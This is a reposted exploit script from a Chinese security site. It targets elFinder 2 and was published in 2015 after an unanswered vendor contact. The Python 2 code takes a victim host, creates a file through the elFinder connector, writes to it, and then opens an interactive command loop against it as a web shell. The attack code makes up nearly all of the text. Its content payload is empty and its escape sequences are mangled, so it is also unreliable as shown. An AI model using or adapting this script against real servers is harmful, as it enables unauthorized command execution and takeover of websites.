文章来源:网友投稿
原创投稿作者:ordar123
#[+] Author: TUNISIAN CYBER
#[+] Title: elFinder 2 Remote Command Execution (Via File Creation) Vulnerability
#[+] Date: 06-05-2015
#[+] Vendor: https://github.com/Studio-42/elFinder
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] Twitter: @TCYB3R
#[+] Time Line:
# 03-05-2015:Vulnerability Discovered
# 03-05-2015:Contacted Vendor
# 04-05-2015:No response
# 05-05-2015:No response
# 06-05-2015:No response
# 06-05-2015:Vulnerability published
import cookielib, urllib
import urllib2
import sys
print"x20x20+-------------------------------------------------+"
print"x20x20| elFinder Remote Command Execution Vulnerability |"
print"x20x20| TUNISIAN CYBER |"
print"x20x20+-------------------------------------------------+"
host = raw_input('x20x20Vulnerable Site:')
evilfile = raw_input('x20x20EvilFileName:')
path=raw_input('x20x20elFinder s Path:')
tcyber = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(tcyber))
create = opener.open('http://'+host+'/'+path+'/php/connector.minimal.php?cmd=mkfile&name='+evilfile+'&target=l1_Lw')
print create.read()
payload = urllib.urlencode({
'cmd' : 'put',
'target' : 'l1_'+evilfile.encode('base64','strict'),
'content' : ''
})
write = opener.open('http://'+host+'/'+path+'/php/connector.minimal.php', payload)
#print write.read()
print 'n'
while True:
try:
cmd = raw_input('[She3LL]:~# ')
execute = opener.open('http://'+host+'/'+path+'/admin/js/plugins/elfinder/files/'+evilfile+'?cmd='+urllib.quote(cmd))
reverse = execute.read()
print reverse;
if cmd.strip() == 'exit':
break
except Exception:
break
sys.exit()
联系/合作/投稿邮箱:[email protected]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论